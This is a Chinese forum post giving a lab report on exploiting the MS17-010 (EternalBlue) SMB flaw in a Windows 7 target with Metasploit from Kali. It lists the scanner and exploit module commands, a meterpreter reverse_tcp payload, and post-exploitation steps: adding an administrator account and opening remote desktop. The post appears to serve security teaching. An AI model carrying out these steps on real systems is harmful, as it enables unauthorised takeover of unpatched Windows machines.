本帖最后由 赵庆煜 于 2024-2-26 13:20 编辑
一、实验目的
熟悉ms17-010漏洞的原理及利用方法,掌握Metasploit的配置使用方法。
实验环境
靶机:Windows 7 测试主机系统:kali-2023.4 二、实验原理
(1)关于Metasploit
Metasploit是一个强大的开源平台,可以用来开发、测试和使用恶意代码,同时为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。
(2)关于ms17-010(Windows SMB远程执行代码漏洞)
微软安全公告KB4013389:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010;此安全更新程序修复了Microsoft Windows中的多个漏洞。如果攻击者向 Windows SMBv1服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。
三、实验步骤
1.启动Metasploit
在操作机Kali上终端使用如下命令,启动Metasploit终端(提示符msf>):msfdb init && msfconsole
2.检测靶机是否存在ms17-010漏洞
(1)在Metasploit终端中输入以下命令,搜索ms17-010相关的模块:search ms17-010
(2)分别输入以下命令,使用smb_ms17_010模块对靶机进行漏洞检测,确认其存在ms17-010漏洞:
use auxiliary/scanner/smb/smb_ms17_010 //使用smb_ms17_010模块
set RHOSTS [靶机IP] //设置目标机的IP地址
run //执行
执行结果显示:靶机存在ms17-010漏洞!
3.利用ms17-010漏洞对靶机执行溢出攻击
(1)分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块
set RHOST [靶机IP] //设置远程主机(靶机)的IP地址
set LHOST [操作机IP] //设置本地主机(操作机)的IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用payload:meterpreter/reverse_tcp
set RPORT 445 //设置目标端口
set target 0 //设置目标操作系统类型(此处为自动识别类型)
run //执行
溢出攻击成功后,返回meterpreter提示符:
4.后渗透模块meterpreter的使用
输入:ipconfig,查看IP地址 输入:sysinfo,查看系统信息 输入:shell,进入cmd控制台,并创建一个名为ceshi的用户,密码为1 将ceshi加入到windows 7的本地管理员组中,并查看; 开启目标主机远程桌面 在kali终端输入rdesktop 【靶机IP】 输入新创建的用户密码 成功远程到靶机。
五、实验总结
本次实验,成功利用Metasploit工具对存在ms17-010漏洞的靶机进行了攻击,熟悉了ms17-010漏洞的原理及利用方法,同时也掌握了Metasploit的配置使用方法。 |